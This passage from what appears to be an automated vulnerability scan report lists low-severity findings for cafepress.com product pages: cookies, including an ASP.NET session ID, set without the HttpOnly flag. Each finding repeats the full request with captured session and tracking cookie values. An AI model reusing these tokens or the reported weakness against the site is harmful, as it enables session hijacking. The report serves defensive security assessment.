cp_sc=100460; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:54 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+baby-hat HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3.9. http://www.cafepress.com/+bags previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+bags

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100104; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:55 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+bags HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3.10. http://www.cafepress.com/+boxers previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+boxers

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100074; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:02 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+boxers HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3.11. http://www.cafepress.com/+bumper-stickers previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+bumper-stickers

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100193; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:21 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+bumper-stickers HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3.12. http://www.cafepress.com/+buttons previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+buttons

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100204; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:26 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+buttons HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3.13. http://www.cafepress.com/+calendars previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+calendars

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100156; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:48 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+calendars HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3.14. http://www.cafepress.com/+clocks previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+clocks

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100161; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:32 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+clocks HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3.15. http://www.cafepress.com/+coasters previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+coasters

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100176; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:35 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+coasters HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3.16. http://www.cafepress.com/+eat_sleep_game_light_tshirt,299007536 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+eat_sleep_game_light_tshirt,299007536

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:11 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+eat_sleep_game_light_tshirt,299007536 HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
